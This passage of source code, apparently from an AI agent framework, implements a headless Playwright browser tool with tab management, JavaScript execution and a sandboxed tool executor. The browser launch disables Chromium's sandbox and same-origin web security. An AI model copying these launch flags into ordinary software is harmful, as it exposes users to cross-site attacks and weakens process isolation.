- Can be fractional (e.g., 0.5 seconds)
- Screenshot is captured after the wait
10. The browser can operate concurrently with other tools. You may invoke
terminal, python, or other tools (in separate assistant messages) while maintaining
the active browser session, enabling sophisticated multi-tool workflows.
11. Keyboard actions:
- Use press_key for individual key presses
- Use type for typing regular text
- Some keys have special names based on Playwright's key documentation
12. All code in the js_code parameter is executed as-is - there's no need to
escape special characters or worry about formatting. Just write your JavaScript
code normally. It can be single line or multi-line.
13. For form filling, click on the field first, then use 'type' to enter text.
14. The browser runs in headless mode using the Chromium engine for security and performance.
</notes>
<examples>
# Launch browser at URL (creates tab_1)
<function=browser_action>
<parameter=action>launch</parameter>
<parameter=url>https://example.com</parameter>
</function>
# Navigate to different URL
<function=browser_action>
<parameter=action>goto</parameter>
<parameter=url>https://github.com</parameter>
</function>
# Open new tab with different URL
<function=browser_action>
<parameter=action>new_tab</parameter>
<parameter=url>https://another-site.com</parameter>
</function>
# Wait for page load
<function=browser_action>
<parameter=action>wait</parameter>
<parameter=duration>2.5</parameter>
</function>
# Click login button at coordinates from screenshot
<function=browser_action>
<parameter=action>click</parameter>
<parameter=coordinate>450,300</parameter>
</function>
# Click username field and type
<function=browser_action>
<parameter=action>click</parameter>
<parameter=coordinate>400,200</parameter>
</function>
<function=browser_action>
<parameter=action>type</parameter>
<parameter=text>user@example.com</parameter>
</function>
# Click password field and type
<function=browser_action>
<parameter=action>click</parameter>
<parameter=coordinate>400,250</parameter>
</function>
<function=browser_action>
<parameter=action>type</parameter>
<parameter=text>mypassword123</parameter>
</function>
# Press Enter key
<function=browser_action>
<parameter=action>press_key</parameter>
<parameter=key>Enter</parameter>
</function>
# Execute JavaScript to get page stats (correct pattern - no return statement)
<function=browser_action>
<parameter=action>execute_js</parameter>
<parameter=js_code>const images = document.querySelectorAll('img');
const links = document.querySelectorAll('a');
{
images: images.length,
links: links.length,
title: document.title
}</parameter>
</function>
# Scroll down
<function=browser_action>
<parameter=action>scroll_down</parameter>
</function>
# Get console logs
<function=browser_action>
<parameter=action>get_console_logs</parameter>
</function>
# View page source
<function=browser_action>
<parameter=action>view_source</parameter>
</function>
</examples>
</tool>
</tools>


@@ -0,0 +1,533 @@
import asyncio
import base64
import logging
import threading
from pathlib import Path
from typing import Any, cast
from playwright.async_api import Browser, BrowserContext, Page, Playwright, async_playwright
logger = logging.getLogger(__name__)
MAX_PAGE_SOURCE_LENGTH = 20_000
MAX_CONSOLE_LOG_LENGTH = 30_000
MAX_INDIVIDUAL_LOG_LENGTH = 1_000
MAX_CONSOLE_LOGS_COUNT = 200
MAX_JS_RESULT_LENGTH = 5_000
class BrowserInstance:
def __init__(self) -> None:
self.is_running = True
self._execution_lock = threading.Lock()
self.playwright: Playwright | None = None
self.browser: Browser | None = None
self.context: BrowserContext | None = None
self.pages: dict[str, Page] = {}
self.current_page_id: str | None = None
self._next_tab_id = 1
self.console_logs: dict[str, list[dict[str, Any]]] = {}
self._loop: asyncio.AbstractEventLoop | None = None
self._loop_thread: threading.Thread | None = None
self._start_event_loop()
def _start_event_loop(self) -> None:
loop_ready = threading.Event()
def run_loop() -> None:
self._loop = asyncio.new_event_loop()
asyncio.set_event_loop(self._loop)
loop_ready.set()
self._loop.run_forever()
self._loop_thread = threading.Thread(target=run_loop, daemon=True)
self._loop_thread.start()
loop_ready.wait()
def _run_async(self, coro: Any) -> dict[str, Any]:
if not self._loop or not self.is_running:
raise RuntimeError("Browser instance is not running")
future = asyncio.run_coroutine_threadsafe(coro, self._loop)
return cast("dict[str, Any]", future.result(timeout=30)) # 30 second timeout
async def _setup_console_logging(self, page: Page, tab_id: str) -> None:
self.console_logs[tab_id] = []
def handle_console(msg: Any) -> None:
text = msg.text
if len(text) > MAX_INDIVIDUAL_LOG_LENGTH:
text = text[:MAX_INDIVIDUAL_LOG_LENGTH] + "... [TRUNCATED]"
log_entry = {
"type": msg.type,
"text": text,
"location": msg.location,
"timestamp": asyncio.get_event_loop().time(),
}
self.console_logs[tab_id].append(log_entry)
if len(self.console_logs[tab_id]) > MAX_CONSOLE_LOGS_COUNT:
self.console_logs[tab_id] = self.console_logs[tab_id][-MAX_CONSOLE_LOGS_COUNT:]
page.on("console", handle_console)
async def _launch_browser(self, url: str | None = None) -> dict[str, Any]:
self.playwright = await async_playwright().start()
self.browser = await self.playwright.chromium.launch(
headless=True,
args=[
"--no-sandbox",
"--disable-dev-shm-usage",
"--disable-gpu",
"--disable-web-security",
"--disable-features=VizDisplayCompositor",
],
)
self.context = await self.browser.new_context(
viewport={"width": 1280, "height": 720},
user_agent=(
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
),
)
page = await self.context.new_page()
tab_id = f"tab_{self._next_tab_id}"
self._next_tab_id += 1
self.pages[tab_id] = page
self.current_page_id = tab_id
await self._setup_console_logging(page, tab_id)
if url:
await page.goto(url, wait_until="domcontentloaded")
return await self._get_page_state(tab_id)
async def _get_page_state(self, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
await asyncio.sleep(2)
screenshot_bytes = await page.screenshot(type="png", full_page=False)
screenshot_b64 = base64.b64encode(screenshot_bytes).decode("utf-8")
url = page.url
title = await page.title()
viewport = page.viewport_size
all_tabs = {}
for tid, tab_page in self.pages.items():
all_tabs[tid] = {
"url": tab_page.url,
"title": await tab_page.title() if not tab_page.is_closed() else "Closed",
}
return {
"screenshot": screenshot_b64,
"url": url,
"title": title,
"viewport": viewport,
"tab_id": tab_id,
"all_tabs": all_tabs,
}
def launch(self, url: str | None = None) -> dict[str, Any]:
with self._execution_lock:
if self.browser is not None:
raise ValueError("Browser is already launched")
return self._run_async(self._launch_browser(url))
def goto(self, url: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._goto(url, tab_id))
async def _goto(self, url: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
await page.goto(url, wait_until="domcontentloaded")
return await self._get_page_state(tab_id)
def click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._click(coordinate, tab_id))
async def _click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
try:
x, y = map(int, coordinate.split(","))
except ValueError as e:
raise ValueError(f"Invalid coordinate format: {coordinate}. Use 'x,y'") from e
page = self.pages[tab_id]
await page.mouse.click(x, y)
return await self._get_page_state(tab_id)
def type_text(self, text: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._type_text(text, tab_id))
async def _type_text(self, text: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
await page.keyboard.type(text)
return await self._get_page_state(tab_id)
def scroll(self, direction: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._scroll(direction, tab_id))
async def _scroll(self, direction: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
if direction == "down":
await page.keyboard.press("PageDown")
elif direction == "up":
await page.keyboard.press("PageUp")
else:
raise ValueError(f"Invalid scroll direction: {direction}")
return await self._get_page_state(tab_id)
def back(self, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._back(tab_id))
async def _back(self, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
await page.go_back(wait_until="domcontentloaded")
return await self._get_page_state(tab_id)
def forward(self, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._forward(tab_id))
async def _forward(self, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
await page.go_forward(wait_until="domcontentloaded")
return await self._get_page_state(tab_id)
def new_tab(self, url: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._new_tab(url))
async def _new_tab(self, url: str | None = None) -> dict[str, Any]:
if not self.context:
raise ValueError("Browser not launched")
page = await self.context.new_page()
tab_id = f"tab_{self._next_tab_id}"
self._next_tab_id += 1
self.pages[tab_id] = page
self.current_page_id = tab_id
await self._setup_console_logging(page, tab_id)
if url:
await page.goto(url, wait_until="domcontentloaded")
return await self._get_page_state(tab_id)
def switch_tab(self, tab_id: str) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._switch_tab(tab_id))
async def _switch_tab(self, tab_id: str) -> dict[str, Any]:
if tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
self.current_page_id = tab_id
return await self._get_page_state(tab_id)
def close_tab(self, tab_id: str) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._close_tab(tab_id))
async def _close_tab(self, tab_id: str) -> dict[str, Any]:
if tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
if len(self.pages) == 1:
raise ValueError("Cannot close the last tab")
page = self.pages.pop(tab_id)
await page.close()
if tab_id in self.console_logs:
del self.console_logs[tab_id]
if self.current_page_id == tab_id:
self.current_page_id = next(iter(self.pages.keys()))
return await self._get_page_state(self.current_page_id)
def wait(self, duration: float, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._wait(duration, tab_id))
async def _wait(self, duration: float, tab_id: str | None = None) -> dict[str, Any]:
await asyncio.sleep(duration)
return await self._get_page_state(tab_id)
def execute_js(self, js_code: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._execute_js(js_code, tab_id))
async def _execute_js(self, js_code: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
try:
result = await page.evaluate(js_code)
except Exception as e: # noqa: BLE001
result = {
"error": True,
"error_type": type(e).__name__,
"error_message": str(e),
}
result_str = str(result)
if len(result_str) > MAX_JS_RESULT_LENGTH:
result = result_str[:MAX_JS_RESULT_LENGTH] + "... [JS result truncated at 5k chars]"
state = await self._get_page_state(tab_id)
state["js_result"] = result
return state
def get_console_logs(self, tab_id: str | None = None, clear: bool = False) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._get_console_logs(tab_id, clear))
async def _get_console_logs(
self, tab_id: str | None = None, clear: bool = False
) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
logs = self.console_logs.get(tab_id, [])
total_length = sum(len(str(log)) for log in logs)
if total_length > MAX_CONSOLE_LOG_LENGTH:
truncated_logs: list[dict[str, Any]] = []
current_length = 0
for log in reversed(logs):
log_length = len(str(log))
if current_length + log_length <= MAX_CONSOLE_LOG_LENGTH:
truncated_logs.insert(0, log)
current_length += log_length
else:
break
if len(truncated_logs) < len(logs):
truncation_notice = {
"type": "info",
"text": (
f"[TRUNCATED: {len(logs) - len(truncated_logs)} older logs "
f"removed to stay within {MAX_CONSOLE_LOG_LENGTH} character limit]"
),
"location": {},
"timestamp": 0,
}
truncated_logs.insert(0, truncation_notice)
logs = truncated_logs
if clear:
self.console_logs[tab_id] = []
state = await self._get_page_state(tab_id)
state["console_logs"] = logs
return state
def view_source(self, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._view_source(tab_id))
async def _view_source(self, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
source = await page.content()
original_length = len(source)
if original_length > MAX_PAGE_SOURCE_LENGTH:
truncation_message = (
f"\n\n<!-- [TRUNCATED: {original_length - MAX_PAGE_SOURCE_LENGTH} "
"characters removed] -->\n\n"
)
available_space = MAX_PAGE_SOURCE_LENGTH - len(truncation_message)
truncate_point = available_space // 2
source = source[:truncate_point] + truncation_message + source[-truncate_point:]
state = await self._get_page_state(tab_id)
state["page_source"] = source
return state
def double_click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._double_click(coordinate, tab_id))
async def _double_click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
try:
x, y = map(int, coordinate.split(","))
except ValueError as e:
raise ValueError(f"Invalid coordinate format: {coordinate}. Use 'x,y'") from e
page = self.pages[tab_id]
await page.mouse.dblclick(x, y)
return await self._get_page_state(tab_id)
def hover(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._hover(coordinate, tab_id))
async def _hover(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
try:
x, y = map(int, coordinate.split(","))
except ValueError as e:
raise ValueError(f"Invalid coordinate format: {coordinate}. Use 'x,y'") from e
page = self.pages[tab_id]
await page.mouse.move(x, y)
return await self._get_page_state(tab_id)
def press_key(self, key: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._press_key(key, tab_id))
async def _press_key(self, key: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
page = self.pages[tab_id]
await page.keyboard.press(key)
return await self._get_page_state(tab_id)
def save_pdf(self, file_path: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
return self._run_async(self._save_pdf(file_path, tab_id))
async def _save_pdf(self, file_path: str, tab_id: str | None = None) -> dict[str, Any]:
if not tab_id:
tab_id = self.current_page_id
if not tab_id or tab_id not in self.pages:
raise ValueError(f"Tab '{tab_id}' not found")
if not Path(file_path).is_absolute():
file_path = str(Path("/workspace") / file_path)
page = self.pages[tab_id]
await page.pdf(path=file_path)
state = await self._get_page_state(tab_id)
state["pdf_saved"] = file_path
return state
def close(self) -> None:
with self._execution_lock:
self.is_running = False
if self._loop:
asyncio.run_coroutine_threadsafe(self._close_browser(), self._loop)
self._loop.call_soon_threadsafe(self._loop.stop)
if self._loop_thread:
self._loop_thread.join(timeout=5)
async def _close_browser(self) -> None:
try:
if self.browser:
await self.browser.close()
if self.playwright:
await self.playwright.stop()
except (OSError, RuntimeError) as e:
logger.warning(f"Error closing browser: {e}")
def is_alive(self) -> bool:
return self.is_running and self.browser is not None and self.browser.is_connected()
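The trailing-window truncation in `_get_console_logs` above keeps only the newest entries whose combined stringified size fits the character budget, then prepends a notice. A standalone sketch of that logic (the `trailing_window` helper name is illustrative, not part of the codebase):

```python
from typing import Any

MAX_CONSOLE_LOG_LENGTH = 30_000


def trailing_window(
    logs: list[dict[str, Any]], limit: int = MAX_CONSOLE_LOG_LENGTH
) -> list[dict[str, Any]]:
    # Keep the newest logs whose combined stringified size fits the limit,
    # walking backwards from the most recent entry.
    if sum(len(str(log)) for log in logs) <= limit:
        return logs
    kept: list[dict[str, Any]] = []
    used = 0
    for log in reversed(logs):
        size = len(str(log))
        if used + size > limit:
            break
        kept.insert(0, log)
        used += size
    if len(kept) < len(logs):
        # Prepend a notice so the caller knows older entries were dropped.
        kept.insert(0, {
            "type": "info",
            "text": f"[TRUNCATED: {len(logs) - len(kept)} older logs removed]",
            "location": {},
            "timestamp": 0,
        })
    return kept
```

Walking from the newest entry backwards means the most recent output always survives, which is what an agent reviewing console logs cares about.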

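`_view_source` uses a different truncation shape: it keeps the head and tail of the page and drops the middle, since interesting markup tends to sit at both ends of an HTML document. A minimal standalone sketch (the `truncate_middle` name is illustrative):

```python
MAX_PAGE_SOURCE_LENGTH = 20_000


def truncate_middle(source: str, limit: int = MAX_PAGE_SOURCE_LENGTH) -> str:
    # Keep the head and tail of the document, drop the middle, and leave
    # an HTML comment stating how many characters were removed.
    if len(source) <= limit:
        return source
    notice = f"\n\n<!-- [TRUNCATED: {len(source) - limit} characters removed] -->\n\n"
    keep = (limit - len(notice)) // 2
    return source[:keep] + notice + source[-keep:]
```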

@@ -0,0 +1,342 @@
import atexit
import contextlib
import signal
import sys
import threading
from typing import Any
from .browser_instance import BrowserInstance
class BrowserTabManager:
def __init__(self) -> None:
self.browser_instance: BrowserInstance | None = None
self._lock = threading.Lock()
self._register_cleanup_handlers()
def launch_browser(self, url: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is not None:
raise ValueError("Browser is already launched")
try:
self.browser_instance = BrowserInstance()
result = self.browser_instance.launch(url)
result["message"] = "Browser launched successfully"
except (OSError, ValueError, RuntimeError) as e:
if self.browser_instance:
self.browser_instance = None
raise RuntimeError(f"Failed to launch browser: {e}") from e
else:
return result
def goto_url(self, url: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.goto(url, tab_id)
result["message"] = f"Navigated to {url}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to navigate to URL: {e}") from e
else:
return result
def click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.click(coordinate, tab_id)
result["message"] = f"Clicked at {coordinate}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to click: {e}") from e
else:
return result
def type_text(self, text: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.type_text(text, tab_id)
result["message"] = f"Typed text: {text[:50]}{'...' if len(text) > 50 else ''}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to type text: {e}") from e
else:
return result
def scroll(self, direction: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.scroll(direction, tab_id)
result["message"] = f"Scrolled {direction}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to scroll: {e}") from e
else:
return result
def back(self, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.back(tab_id)
result["message"] = "Navigated back"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to go back: {e}") from e
else:
return result
def forward(self, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.forward(tab_id)
result["message"] = "Navigated forward"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to go forward: {e}") from e
else:
return result
def new_tab(self, url: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.new_tab(url)
result["message"] = f"Created new tab {result.get('tab_id', '')}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to create new tab: {e}") from e
else:
return result
def switch_tab(self, tab_id: str) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.switch_tab(tab_id)
result["message"] = f"Switched to tab {tab_id}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to switch tab: {e}") from e
else:
return result
def close_tab(self, tab_id: str) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.close_tab(tab_id)
result["message"] = f"Closed tab {tab_id}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to close tab: {e}") from e
else:
return result
def wait_browser(self, duration: float, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.wait(duration, tab_id)
result["message"] = f"Waited {duration}s"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to wait: {e}") from e
else:
return result
def execute_js(self, js_code: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.execute_js(js_code, tab_id)
result["message"] = "JavaScript executed successfully"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to execute JavaScript: {e}") from e
else:
return result
def double_click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.double_click(coordinate, tab_id)
result["message"] = f"Double clicked at {coordinate}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to double click: {e}") from e
else:
return result
def hover(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.hover(coordinate, tab_id)
result["message"] = f"Hovered at {coordinate}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to hover: {e}") from e
else:
return result
def press_key(self, key: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.press_key(key, tab_id)
result["message"] = f"Pressed key {key}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to press key: {e}") from e
else:
return result
def save_pdf(self, file_path: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.save_pdf(file_path, tab_id)
result["message"] = f"Page saved as PDF: {file_path}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to save PDF: {e}") from e
else:
return result
def get_console_logs(self, tab_id: str | None = None, clear: bool = False) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.get_console_logs(tab_id, clear)
action_text = "cleared and retrieved" if clear else "retrieved"
logs = result.get("console_logs", [])
truncated = any(log.get("text", "").startswith("[TRUNCATED:") for log in logs)
truncated_text = " (truncated)" if truncated else ""
result["message"] = (
f"Console logs {action_text} for tab "
f"{result.get('tab_id', 'current')}{truncated_text}"
)
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to get console logs: {e}") from e
else:
return result
def view_source(self, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.view_source(tab_id)
result["message"] = "Page source retrieved"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to get page source: {e}") from e
else:
return result
def list_tabs(self) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
return {"tabs": {}, "total_count": 0, "current_tab": None}
try:
tab_info = {}
for tid, tab_page in self.browser_instance.pages.items():
try:
tab_info[tid] = {
"url": tab_page.url,
"title": "Unknown" if tab_page.is_closed() else "Active",
"is_current": tid == self.browser_instance.current_page_id,
}
except (AttributeError, RuntimeError):
tab_info[tid] = {
"url": "Unknown",
"title": "Closed",
"is_current": False,
}
return {
"tabs": tab_info,
"total_count": len(tab_info),
"current_tab": self.browser_instance.current_page_id,
}
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to list tabs: {e}") from e
def close_browser(self) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
try:
self.browser_instance.close()
self.browser_instance = None
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to close browser: {e}") from e
else:
return {
"message": "Browser closed successfully",
"screenshot": "",
"is_running": False,
}
def cleanup_dead_browser(self) -> None:
with self._lock:
if self.browser_instance and not self.browser_instance.is_alive():
with contextlib.suppress(Exception):
self.browser_instance.close()
self.browser_instance = None
def close_all(self) -> None:
with self._lock:
if self.browser_instance:
with contextlib.suppress(Exception):
self.browser_instance.close()
self.browser_instance = None
def _register_cleanup_handlers(self) -> None:
atexit.register(self.close_all)
signal.signal(signal.SIGTERM, self._signal_handler)
signal.signal(signal.SIGINT, self._signal_handler)
if hasattr(signal, "SIGHUP"):
signal.signal(signal.SIGHUP, self._signal_handler)
def _signal_handler(self, _signum: int, _frame: Any) -> None:
self.close_all()
sys.exit(0)
_browser_tab_manager = BrowserTabManager()
def get_browser_tab_manager() -> BrowserTabManager:
return _browser_tab_manager
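BrowserTabManager holds a single lock-guarded browser slot and registers idempotent cleanup via atexit and signal handlers, so a crashed agent cannot leak a headless Chromium. A reduced sketch of that lifecycle pattern, with a hypothetical `ManagedResource` standing in for `BrowserInstance`:

```python
import atexit
import contextlib
import threading


class ManagedResource:
    # Hypothetical stand-in for BrowserInstance: just records whether close() ran.
    def __init__(self) -> None:
        self.closed = False

    def close(self) -> None:
        if self.closed:
            raise RuntimeError("already closed")
        self.closed = True


class ResourceManager:
    # A single lock-guarded resource slot with idempotent cleanup, suitable
    # for registering with atexit and signal handlers.
    def __init__(self) -> None:
        self._resource: ManagedResource | None = None
        self._lock = threading.Lock()
        atexit.register(self.close_all)  # best-effort cleanup at interpreter exit

    def launch(self) -> ManagedResource:
        with self._lock:
            if self._resource is not None:
                raise ValueError("already launched")
            self._resource = ManagedResource()
            return self._resource

    def close_all(self) -> None:
        with self._lock:
            if self._resource:
                with contextlib.suppress(Exception):
                    self._resource.close()
                self._resource = None


manager = ResourceManager()
res = manager.launch()
manager.close_all()
manager.close_all()  # second call is a no-op
```

Suppressing exceptions inside `close_all` and nulling the slot afterwards is what makes the handler safe to call from atexit, a signal handler, and normal teardown in any order.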

strix/tools/executor.py Normal file

@@ -0,0 +1,302 @@
import inspect
import os
from typing import Any
import httpx
if os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "false":
from strix.runtime import get_runtime
from .argument_parser import convert_arguments
from .registry import (
get_tool_by_name,
get_tool_names,
needs_agent_state,
should_execute_in_sandbox,
)
async def execute_tool(tool_name: str, agent_state: Any | None = None, **kwargs: Any) -> Any:
execute_in_sandbox = should_execute_in_sandbox(tool_name)
sandbox_mode = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
if execute_in_sandbox and not sandbox_mode:
return await _execute_tool_in_sandbox(tool_name, agent_state, **kwargs)
return await _execute_tool_locally(tool_name, agent_state, **kwargs)
async def _execute_tool_in_sandbox(tool_name: str, agent_state: Any, **kwargs: Any) -> Any:
if not hasattr(agent_state, "sandbox_id") or not agent_state.sandbox_id:
raise ValueError("Agent state with a valid sandbox_id is required for sandbox execution.")
if not hasattr(agent_state, "sandbox_token") or not agent_state.sandbox_token:
raise ValueError(
"Agent state with a valid sandbox_token is required for sandbox execution."
)
if (
not hasattr(agent_state, "sandbox_info")
or "tool_server_port" not in agent_state.sandbox_info
):
raise ValueError(
"Agent state with a valid sandbox_info containing tool_server_port is required."
)
runtime = get_runtime()
tool_server_port = agent_state.sandbox_info["tool_server_port"]
server_url = await runtime.get_sandbox_url(agent_state.sandbox_id, tool_server_port)
request_url = f"{server_url}/execute"
request_data = {
"tool_name": tool_name,
"kwargs": kwargs,
}
headers = {
"Authorization": f"Bearer {agent_state.sandbox_token}",
"Content-Type": "application/json",
}
async with httpx.AsyncClient() as client:
try:
response = await client.post(
request_url, json=request_data, headers=headers, timeout=None
)
response.raise_for_status()
response_data = response.json()
if response_data.get("error"):
raise RuntimeError(f"Sandbox execution error: {response_data['error']}")
return response_data.get("result")
except httpx.HTTPStatusError as e:
if e.response.status_code == 401:
raise RuntimeError("Authentication failed: Invalid or missing sandbox token") from e
raise RuntimeError(f"HTTP error calling tool server: {e.response.status_code}") from e
except httpx.RequestError as e:
raise RuntimeError(f"Request error calling tool server: {e}") from e
async def _execute_tool_locally(tool_name: str, agent_state: Any | None, **kwargs: Any) -> Any:
tool_func = get_tool_by_name(tool_name)
if not tool_func:
raise ValueError(f"Tool '{tool_name}' not found")
converted_kwargs = convert_arguments(tool_func, kwargs)
if needs_agent_state(tool_name):
if agent_state is None:
raise ValueError(f"Tool '{tool_name}' requires agent_state but none was provided.")
result = tool_func(agent_state=agent_state, **converted_kwargs)
else:
result = tool_func(**converted_kwargs)
return await result if inspect.isawaitable(result) else result
def validate_tool_availability(tool_name: str | None) -> tuple[bool, str]:
if tool_name is None:
return False, "Tool name is missing"
if tool_name not in get_tool_names():
return False, f"Tool '{tool_name}' is not available"
return True, ""
async def execute_tool_with_validation(
tool_name: str | None, agent_state: Any | None = None, **kwargs: Any
) -> Any:
is_valid, error_msg = validate_tool_availability(tool_name)
if not is_valid:
return f"Error: {error_msg}"
assert tool_name is not None
try:
result = await execute_tool(tool_name, agent_state, **kwargs)
except Exception as e: # noqa: BLE001
error_str = str(e)
if len(error_str) > 500:
error_str = error_str[:500] + "... [truncated]"
return f"Error executing {tool_name}: {error_str}"
else:
return result
async def execute_tool_invocation(tool_inv: dict[str, Any], agent_state: Any | None = None) -> Any:
